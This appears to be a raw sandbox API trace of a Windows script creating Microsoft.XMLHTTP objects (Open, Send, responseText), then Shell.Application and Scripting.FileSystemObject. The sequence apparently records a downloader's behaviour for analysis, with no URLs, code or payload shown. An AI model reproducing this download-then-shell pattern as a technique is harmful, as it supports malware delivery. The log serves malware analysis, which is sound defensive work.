	[0434.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0434.783] longjmp () 
	[0434.783] longjmp () 
	[0434.783] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0434.783] SysStringLen (param_1=0x0) returned 0x0
	[0434.783] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0434.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0434.783] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0434.783] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0434.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0434.783] ??2@YAPEAX_K@Z () returned 0x62f310
	[0434.783] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0434.783] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0434.784] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0434.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0434.784] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0434.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.784] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0434.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0434.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.784] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0434.784] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0435.730] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0435.730] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0435.730] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0435.730] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0435.730] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0435.730] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0435.730] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0435.730] SysStringLen (param_1=0x0) returned 0x0
	[0435.730] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0435.730] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0435.731] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0435.731] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0435.731] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0435.731] ??2@YAPEAX_K@Z () returned 0x62f350
	[0435.731] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0435.731] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0435.731] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0435.731] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0435.731] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0435.731] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0435.731] SysStringLen (param_1=0x0) returned 0x0
	[0435.731] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0435.734] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0435.734] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0435.735] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0435.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0435.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0435.735] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0436.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0436.673] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0436.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0436.674] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0436.674] SysStringLen (param_1=0x0) returned 0x0
	[0436.674] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0436.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0436.674] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0436.675] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0436.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0436.675] ??2@YAPEAX_K@Z () returned 0x62f310
	[0436.675] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0436.675] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0436.675] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0436.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0436.675] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0436.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.675] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0436.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.678] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0436.678] SysStringLen (param_1=0x0) returned 0x0
	[0436.678] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0436.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0436.678] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0436.678] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0436.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0436.678] ??2@YAPEAX_K@Z () returned 0x62f330
	[0436.678] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0436.678] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0436.678] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0436.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0436.678] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0436.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.678] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0436.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.679] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0436.679] SysStringLen (param_1=0x0) returned 0x0
	[0436.679] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0436.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0436.679] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0436.679] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0436.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0436.679] ??2@YAPEAX_K@Z () returned 0x62f310
	[0436.679] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0436.679] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0436.679] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0436.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0436.679] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0436.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
